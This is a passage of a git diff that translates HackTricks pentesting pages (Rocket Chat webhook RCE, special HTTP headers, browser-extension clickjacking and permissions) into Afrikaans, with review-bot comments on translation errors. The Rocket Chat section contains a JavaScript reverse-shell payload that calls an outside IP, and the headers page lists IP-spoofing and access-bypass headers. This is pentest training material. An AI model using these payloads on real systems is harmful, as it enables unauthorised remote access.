Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
## RCE -If you are admin inside Rocket Chat you can get RCE. +As jy 'n admin binne Rocket Chat is, kan jy RCE kry. -* Got to **`Integrations`** and select **`New Integration`** and choose any: **`Incoming WebHook`** or **`Outgoing WebHook`**. - * `/admin/integrations/incoming` +* Gaan na **`Integrations`** en kies **`New Integration`** en kies enigeen: **`Incoming WebHook`** of **`Outgoing WebHook`**. +* `/admin/integrations/incoming`
-* According to the [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), both use ES2015 / ECMAScript 6 ([basically JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) to process the data. So lets get a [rev shell for javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) like: - +* Volgens die [dokumentasie](https://docs.rocket.chat/guides/administration/admin-panel/integrations), gebruik albei ES2015 / ECMAScript 6 ([basies JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) om die data te verwerk. So laat ons 'n [rev shell vir javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) kry soos: ```javascript const require = console.log.constructor('return process.mainModule.require')(); const { exec } = require('child_process'); exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'") ``` - -* Configure the WebHook (the channel and post as username must exists): +* Stel die WebHook in (die kanaal en pos as gebruikersnaam moet bestaan):
-* Configure WebHook script: +* Stel die WebHook-skrip in:
-* Save changes -* Get the generated WebHook URL: +* Stoor veranderinge +* Kry die gegenereerde WebHook URL:
-* Call it with curl and you shuold receive the rev shell +* Roep dit aan met curl en jy behoort die rev shell te ontvang
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
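Review bot: list nesting is lost in the RCE steps: the original has `  * \`/admin/integrations/incoming\`` indented under the "Got to Integrations" step, but the translated line `+* \`/admin/integrations/incoming\`` is a top-level bullet, so the path no longer reads as the location of that step; keep the two-space indent. The blank lines around the ```javascript fence were also dropped, and the footer uses "hack-truuks" here but "hacktruuks" at the end of the same file, so pick one spelling.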
diff --git a/network-services-pentesting/pentesting-web/special-http-headers.md b/network-services-pentesting/pentesting-web/special-http-headers.md index 30d8382e5..dba43bdf6 100644 --- a/network-services-pentesting/pentesting-web/special-http-headers.md +++ b/network-services-pentesting/pentesting-web/special-http-headers.md @@ -1,27 +1,27 @@ -# Special HTTP headers +# Spesiale HTTP-koppe
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Wordlists & Tools +## Woordlyste & Gereedskap * [https://github.com/danielmiessler/SecLists/tree/master/Miscellaneous/web/http-request-headers](https://github.com/danielmiessler/SecLists/tree/master/Miscellaneous/web/http-request-headers) * [https://github.com/rfc-st/humble](https://github.com/rfc-st/humble) -## Headers to Change Location +## Koppe om Ligging te Verander -Rewrite **IP source**: +Herskryf **IP-bron**: * `X-Originating-IP: 127.0.0.1` * `X-Forwarded-For: 127.0.0.1` @@ -38,16 +38,16 @@ Rewrite **IP source**: * `True-Client-IP: 127.0.0.1` * `Cluster-Client-IP: 127.0.0.1` * `Via: 1.0 fred, 1.1 127.0.0.1` -* `Connection: close, X-Forwarded-For` (Check hop-by-hop headers) +* `Connection: close, X-Forwarded-For` (Kyk hop-by-hop-koppe na) -Rewrite **location**: +Herskryf **ligging**: * `X-Original-URL: /admin/console` * `X-Rewrite-URL: /admin/console` -## Hop-by-Hop headers +## Hop-by-Hop-koppe -A hop-by-hop header is a header which is designed to be processed and consumed by the proxy currently handling the request, as opposed to an end-to-end header. +'n Hop-by-hop-kop is 'n kop wat ontwerp is om verwerk en verbruik te word deur die tans hanteerende proksi, in teenstelling met 'n end-to-end-kop. * `Connection: close, X-Forwarded-For` @@ -55,7 +55,7 @@ A hop-by-hop header is a header which is designed to be processed and consumed b [abusing-hop-by-hop-headers.md](../../pentesting-web/abusing-hop-by-hop-headers.md) {% endcontent-ref %} -## HTTP Request Smuggling +## HTTP-versoeksmokkelary * `Content-Length: 30` * `Transfer-Encoding: chunked` 
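Review bot: the hop-by-hop definition drops "the request" from "the proxy currently handling the request": `+'n Hop-by-hop-kop is 'n kop wat ontwerp is om verwerk en verbruik te word deur die tans hanteerende proksi` reads as "the currently handling proxy". Suggest `deur die proksi wat die versoek tans hanteer, in teenstelling met 'n end-to-end-kop`.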
@@ -64,90 +64,86 @@ A hop-by-hop header is a header which is designed to be processed and consumed b [http-request-smuggling](../../pentesting-web/http-request-smuggling/) {% endcontent-ref %} -## Cache Headers +## Kaskoppe -**Server Cache Headers**: +**Bedienerkaskoppe**: -* **`X-Cache`** in the response may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached -* **`Cache-Control`** indicates if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800` -* **`Vary`** is often used in the response to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. -* **`Age`** defines the times in seconds the object has been in the proxy cache. -* **`Server-Timing: cdn-cache; desc=HIT`** also indicates that a resource was cached +* **`X-Cache`** in die respons kan die waarde **`miss`** hê as die versoek nie gekasheer is nie en die waarde **`hit`** as dit gekasheer is +* **`Cache-Control`** dui aan of 'n bron gekasheer word en wanneer die bron weer gekasheer sal word: `Cache-Control: public, max-age=1800` +* **`Vary`** word dikwels in die respons gebruik om **bykomende koppe** aan te dui wat as **deel van die kassleutel** hanteer word, selfs al is hulle normaalweg nie gesleutel nie. +* **`Age`** definieer die tyd in sekondes wat die voorwerp in die proksi-kas was. 
+* **`Server-Timing: cdn-cache; desc=HIT`** dui ook aan dat 'n bron gekasheer is {% content-ref url="../../pentesting-web/cache-deception.md" %} [cache-deception.md](../../pentesting-web/cache-deception.md) {% endcontent-ref %} -**Local Cache headers**: +**Plaaslike kaskoppe**: -* `Clear-Site-Data`: Header to indicate the cache that should be removed: `Clear-Site-Data: "cache", "cookies"` -* `Expires`: Contains date/time when the response should expire: `Expires: Wed, 21 Oct 2015 07:28:00 GMT` -* `Pragma: no-cache` same as `Cache-Control: no-cache` -* `Warning`: The **`Warning`** general HTTP header contains information about possible problems with the status of the message. More than one `Warning` header may appear in a response. `Warning: 110 anderson/1.3.37 "Response is stale"` +* `Clear-Site-Data`: Kop om aan te dui watter kas verwyder moet word: `Clear-Site-Data: "cache", "cookies"` +* `Expires`: Bevat die datum/tyd wanneer die respons moet verval: `Expires: Wed, 21 Oct 2015 07:28:00 GMT` +* `Pragma: no-cache` dieselfde as `Cache-Control: no-cache` +* `Warning`: Die **`Warning`** algemene HTTP-kop bevat inligting oor moontlike probleme met die status van die boodskap. Meer as een `Warning`-kop kan in 'n respons voorkom. `Warning: 110 anderson/1.3.37 "Response is stale"` -## Conditionals +## Voorwaardelik -* Requests using these headers: **`If-Modified-Since`** and **`If-Unmodified-Since`** will be responded with data only if the response header\*\*`Last-Modified`\*\* contains a different time. -* Conditional requests using **`If-Match`** and **`If-None-Match`** use an Etag value so the web server will send the content of the response if the data (Etag) has changed. The `Etag` is taken from the HTTP response. - * The **Etag** value is usually **calculated based** on the **content** of the response. For example, `ETag: W/"37-eL2g8DEyqntYlaLp5XLInBWsjWI"` indicates that the `Etag` is the **Sha1** of **37 bytes**. 
+* Versoeke met hierdie koppe: **`If-Modified-Since`** en **`If-Unmodified-Since`** sal slegs met data reageer as die responskop\*\*`Last-Modified`\*\* 'n ander tyd bevat. +* Voorwaardelike versoeke met **`If-Match`** en **`If-None-Match`** gebruik 'n Etag-waarde sodat die webbediener die inhoud van die respons sal stuur as die data (Etag) verander het. Die `Etag` word geneem uit die HTTP-respons. +* Die **Etag**-waarde word gewoonlik **bereken op grond** van die **inhoud** van die respons. Byvoorbeeld, `ETag: W/"37-eL2g8DEyqntYlaLp5XLInBWsjWI"` dui aan dat die `Etag` die **Sha1** van **37 byte** is. -## Range requests +## Reeksversoeke -* **`Accept-Ranges`**: Indicates if the server supports range requests, and if so in which unit the range can be expressed. `Accept-Ranges: ` -* **`Range`**: Indicates the part of a document that the server should return. -* **`If-Range`**: Creates a conditional range request that is only fulfilled if the given etag or date matches the remote resource. Used to prevent downloading two ranges from incompatible version of the resource. -* **`Content-Range`**: Indicates where in a full body message a partial message belongs. +* **`Accept-Ranges`**: Dui aan of die bediener reeksversoeke ondersteun, en indien wel, in watter eenheid die reeks uitgedruk kan word. `Accept-Ranges: ` +* **`Range`**: Dui die deel van 'n dokument aan wat die bediener moet terugstuur. +* **`If-Range`**: Skep 'n voorwaardelike reeksversoek wat slegs vervul word as die gegewe etiket of datum ooreenstem met die afgelewerde bron. Word gebruik om te voorkom dat twee reekse vanaf 'n onverenigbare weergawe van die bron afgelaai word. +* **`Content-Range`**: Dui aan waar in 'n volledige boodskap 'n gedeeltelike boodskap hoort. -## Message body information +## Inligting oor boodskapliggaam -* **`Content-Length`:** The size of the resource, in decimal number of bytes. 
-* **`Content-Type`**: Indicates the media type of the resource -* **`Content-Encoding`**: Used to specify the compression algorithm. -* **`Content-Language`**: Describes the human language(s) intended for the audience, so that it allows a user to differentiate according to the users' own preferred language. -* **`Content-Location`**: Indicates an alternate location for the returned data. +* **`Content-Length`:** Die grootte van die bron, in desimale getal van byte. +* **`Content-Type`**: Dui die media-tipe van die bron aan +* **`Content-Encoding`**: Word gebruik om die kompressie-algoritme aan te dui. +* **`Content-Language`**: Beskryf die menslike taal(tale) bedoel vir die gehoor, sodat dit 'n gebruiker in staat stel om te onderskei volgens die gebruikers se eie voorkeurstaal. +* **`Content-Location`**: Dui 'n alternatiewe ligging vir die teruggekeerde data aan. -From a pentest point of view this information is usually "useless", but if the resource is **protected** by a 401 or 403 and you can find some **way** to **get** this **info**, this could be **interesting.**\ -For example a combination of **`Range`** and **`Etag`** in a HEAD request can leak the content of the page via HEAD requests: +Vanuit 'n pentest-oogpunt is hierdie inligting gewoonlik "nutteloos", maar as die bron **beskerm** word deur 'n 401 of 403 en jy kan 'n **manier** vind om hierdie **inligting** te **kry**, kan dit **interessant** wees.\ +Byvoorbeeld, 'n kombinasie van **`Range`** en +## Bedienerinligting -* A request with the header `Range: bytes=20-20` and with a response containing `ETag: W/"1-eoGvPlkaxxP4HqHv6T3PNhV9g3Y"` is leaking that the SHA1 of the byte 20 is `ETag: eoGvPlkaxxP4HqHv6T3PNhV9g3Y` - -## Server Info - -* `Server: Apache/2.4.1 (Unix)` +* `Bediener: Apache/2.4.1 (Unix)` * `X-Powered-By: PHP/5.3.3` -## Controls +## Beheer -* **`Allow`**: This header is used to communicate the HTTP methods a resource can handle. 
For example, it might be specified as `Allow: GET, POST, HEAD`, indicating that the resource supports these methods. -* **`Expect`**: Utilized by the client to convey expectations that the server needs to meet for the request to be processed successfully. A common use case involves the `Expect: 100-continue` header, which signals that the client intends to send a large data payload. The client looks for a `100 (Continue)` response before proceeding with the transmission. This mechanism helps in optimizing network usage by awaiting server confirmation. +* **`Allow`**: Hierdie kop is gebruik om die HTTP-metodes te kommunikeer wat 'n hulpbron kan hanteer. Byvoorbeeld, dit kan gespesifiseer word as `Allow: GET, POST, HEAD`, wat aandui dat die hulpbron hierdie metodes ondersteun. +* **`Expect`**: Dit word deur die kliënt gebruik om verwagtinge oor te dra wat die bediener moet nakom vir die versoek om suksesvol verwerk te word. 'n Algemene gebruikssituasie behels die `Expect: 100-continue` kop, wat aandui dat die kliënt van plan is om 'n groot data-pakket te stuur. Die kliënt soek na 'n `100 (Continue)`-reaksie voordat hy met die oordrag voortgaan. Hierdie meganisme help om netwerkgebruik te optimaliseer deur op bevestiging van die bediener te wag. -## Downloads +## Aflaai -* The **`Content-Disposition`** header in HTTP responses directs whether a file should be displayed **inline** (within the webpage) or treated as an **attachment** (downloaded). For instance: +* Die **`Content-Disposition`**-kop in HTTP-reaksies bepaal of 'n lêer **inline** (binne die webblad) vertoon moet word of as 'n **bylaag** (afgelaai) behandel moet word. Byvoorbeeld: ``` Content-Disposition: attachment; filename="filename.jpg" ``` -This means the file named "filename.jpg" is intended to be downloaded and saved. +Dit beteken die lêernaam "filename.jpg" is bedoel om afgelaai en gestoor te word. 
-## Security Headers +## Sekuriteitskoppe -### Content Security Policy (CSP) +### Inhoud Sekuriteitsbeleid (CSP) {% content-ref url="../../pentesting-web/content-security-policy-csp-bypass/" %} [content-security-policy-csp-bypass](../../pentesting-web/content-security-policy-csp-bypass/) {% endcontent-ref %} -### **Trusted Types** - -By enforcing Trusted Types through CSP, applications can be protected against DOM XSS attacks. Trusted Types ensure that only specifically crafted objects, compliant with established security policies, can be used in dangerous web API calls, thereby securing JavaScript code by default. +### **Vertroue Tipes** +Deur Vertroue Tipes af te dwing deur middel van CSP, kan programme beskerm word teen DOM XSS-aanvalle. Vertroue Tipes verseker dat slegs spesifiek ontwerpte voorwerpe, wat voldoen aan vasgestelde sekuriteitsbeleide, gebruik kan word in gevaarlike web API-oproepe, en sodoende JavaScript-kode standaard beveilig. ```javascript // Feature detection if (window.trustedTypes && trustedTypes.createPolicy) { - // Name and create a policy - const policy = trustedTypes.createPolicy('escapePolicy', { - createHTML: str => str.replace(/\/g, '>'); - }); +// Name and create a policy +const policy = trustedTypes.createPolicy('escapePolicy', { +createHTML: str => str.replace(/\/g, '>'); +}); } ``` 
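Review bot: content is truncated and a literal header name is translated in the `@@ -64,90` hunk. The sentence `+Byvoorbeeld, 'n kombinasie van **\`Range\`** en` stops mid-sentence and the bullet that followed it in the original (`-* A request with the header \`Range: bytes=20-20\` and with a response containing \`ETag: ...\``) is removed with no replacement, while `## Bedienerinligting` is moved up into its place; restore the full sentence and the bullet before the Server Info heading. In the same hunk `-* \`Server: Apache/2.4.1 (Unix)\`` became `+* \`Bediener: Apache/2.4.1 (Unix)\``; `Server:` is the wire header name and must stay as-is, like `X-Powered-By:` on the next line. The Trusted Types JavaScript block also lost its indentation inside `trustedTypes.createPolicy(...)`; keep the original formatting since code is not translated.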
@@ -157,51 +153,40 @@ el.innerHTML = 'some string'; // Throws an exception. const escaped = policy.createHTML(''); el.innerHTML = escaped; // Results in safe assignment. ``` +### **X-Inhouds-Tipe-Keuses** -### **X-Content-Type-Options** - -This header prevents MIME type sniffing, a practice that could lead to XSS vulnerabilities. It ensures that browsers respect the MIME types specified by the server. - +Hierdie kop voorkom MIME-tipe sniffing, 'n praktyk wat kan lei tot XSS kwesbaarhede. Dit verseker dat webblaaier die MIME-tipes wat deur die bediener gespesifiseer is, respekteer. ``` X-Content-Type-Options: nosniff ``` - ### **X-Frame-Options** -To combat clickjacking, this header restricts how documents can be embedded in ``, ` ``` +## Metamask Voorbeeld -## Metamask Example - -A [**blog post about a ClickJacking in metamask can be found here**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). In this case, Metamask fixed the vulnerability by checking that the protocol used to access it was **`https:`** or **`http:`** (not **`chrome:`** for example): +'n [**Blogpos oor 'n ClickJacking in Metamask kan hier gevind word**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). In hierdie geval het Metamask die kwesbaarheid reggestel deur te kontroleer dat die protokol wat gebruik word om dit te benader, **`https:`** of **`http:`** was (nie byvoorbeeld **`chrome:`** nie):
-**Another ClickJacking fixed** in the Metamask extension was that users were able to **Click to whitelist** when a page was suspicious of being phishing because of `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`. As that page was vulnerable to Clickjacking, an attacker could abuse it showing something normal to make the victim click to whitelist it without noticing, and then going back to the phishing page which will be whitelisted. +**'n Ander ClickJacking wat reggestel is** in die Metamask-uitbreiding was dat gebruikers kon **Klik om te witlys** wanneer 'n bladsy verdag was om 'n phising-poging te wees as gevolg van `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`. Aangesien daardie bladsy vatbaar was vir Clickjacking, kon 'n aanvaller dit misbruik deur iets normaals te wys om die slagoffer te laat klik om dit wit te lys sonder om dit te besef, en dan terug te keer na die phising-bladsy wat witgelys sal wees. -## Steam Inventory Helper Example +## Steam Inventory Helper Voorbeeld -Check the following page to check how a **XSS** in a browser extension was chained with a **ClickJacking** vulnerability: +Kyk na die volgende bladsy om te sien hoe 'n **XSS** in 'n blaaieruitbreiding gekoppel is aan 'n **ClickJacking**-kwesbaarheid: {% content-ref url="browext-xss-example.md" %} [browext-xss-example.md](browext-xss-example.md) {% endcontent-ref %} -## References +## Verwysings * [https://blog.lizzie.io/clickjacking-privacy-badger.html](https://blog.lizzie.io/clickjacking-privacy-badger.html) * [https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
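Review bot: `-### **X-Content-Type-Options**` was translated to `+### **X-Inhouds-Tipe-Keuses**`; this is a response header name and should stay literal, as `### **X-Frame-Options**` and the code line `X-Content-Type-Options: nosniff` in the same hunk were correctly kept. The blank lines around that ``` fence were also removed. In the Metamask paragraph "phising-poging" and "phising-bladsy" should be "phishing-poging" and "phishing-bladsy", and the footer's "haktruuks" does not match the "hacktruuks"/"hack-truuks" used in the other files of this patch.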
diff --git a/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md b/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md index 61385f93d..6faf83a25 100644 --- a/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md +++ b/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md @@ -1,141 +1,124 @@ -# BrowExt - permissions & host\_permissions +# BrowExt - toestemmings & host_toestemmings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -### **`permissions`** +### **`toestemmings`** -Permissions are defined in the extension's **`manifest.json`** file using the **`permissions`** property and allow access to almost anything a browser can access (Cookies or Physical Storage): +Toestemmings word in die uitbreiding se **`manifest.json`**-lêer gedefinieer deur die **`toestemmings`**-eienskap en gee toegang tot byna enige iets waartoe 'n webblaaier toegang kan verkry (Koekies of Fisiese Berging): -The previous manifest declares that the extension requires the `storage` permission. This means that it can use [the storage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) to store its data persistently. Unlike cookies or `localStorage` APIs which give users some level of control, **extension storage can normally only be cleared by uninstalling the extension**. +Die vorige manifest verklaar dat die uitbreiding die `storage`-toestemming benodig. Dit beteken dat dit die [berging-API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) kan gebruik om sy data volhoubaar te stoor. Anders as koekies of `localStorage`-API's wat gebruikers 'n mate van beheer gee, kan **uitbreidingsberging normaalweg slegs deur die uitbreiding te deïnstalleer, skoongemaak word**. -An extension will request the permissions indicated in its **`manifest.json`** file and After installing the extension, you can **always check its permissions in your browser**, as shown in this image: +'n Uitbreiding sal die toestemmings wat in sy **`manifest.json`**-lêer aangedui word, aanvra en nadat die uitbreiding geïnstalleer is, kan jy **altyd sy toestemmings in jou webblaaier nagaan**, soos in hierdie prentjie gewys word:
-You can find the [**complete list of permissions a Chromium Browser Extension can request here**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) and a [**complete list for Firefox extensions here**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api\_permissions)**.** +Jy kan die [**volledige lys van toestemmings wat 'n Chromium-webblaaieruitbreiding kan aanvra, hier vind**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) en 'n [**volledige lys vir Firefox-uitbreidings hier**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api_permissions)**.** -### `host_permissions` +### `host_toestemmings` -The optional but powerful setting **`host_permissions`** indicates with which hosts the extension is going to be able to interact via apis such as [`cookies`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/cookies), [`webRequest`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/webRequest), and [`tabs`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs). - -The following `host_permissions` basically allow every web: +Die opsionele maar kragtige instelling **`host_toestemmings`** dui aan met watter gasheerbedieners die uitbreiding in staat sal wees om te interaksieer via API's soos [`koekies`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/cookies), [`webRequest`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/webRequest), en [`tabs`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs). 
+Die volgende `host_toestemmings` maak basies elke webblaaier moontlik: ```json "host_permissions": [ - "*://*/*" +"*://*/*" ] // Or: "host_permissions": [ - "http://*/*", - "https://*/*" +"http://*/*", +"https://*/*" ] // Or: "host_permissions": [ - "" +"" ] ``` +Hierdie is die gasheer wat die webblaaier-uitbreiding vrylik kan toegang. Dit is omdat wanneer 'n webblaaier-uitbreiding **`fetch("https://gmail.com/")`** roep, dit nie beperk word deur CORS nie. -These are the hosts that the browser extension can access freely. This is because when a browser extension calls **`fetch("https://gmail.com/")`** it's not restricted by CORS. +## Misbruik van `permissions` en `host_permissions` -## Abusing `permissions` and `host_permissions` +### Vlakke -### Tabs - -Moreover, **`host_permissions`** also unlock “advanced” [**tabs API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) **functionality.** They allow the extension to call [tabs.query()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/query) and not only get a **list of user’s browser tabs** back but also learn which **web page (meaning address and title) is loaded**. +Verder ontgrendel **`host_permissions`** ook "gevorderde" [**tabs API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) **funksionaliteit.** Dit stel die uitbreiding in staat om [tabs.query()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/query) te roep en nie net 'n **lys van die gebruiker se blaaier-vlakke** terug te kry nie, maar ook te leer watter **webbladsy (beteken adres en titel) gelaai is**. {% hint style="danger" %} -Not only that, listeners like [**tabs.onUpdated**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/onUpdated) **become way more useful as well**. These will be notified whenever a new page loads into a tab. 
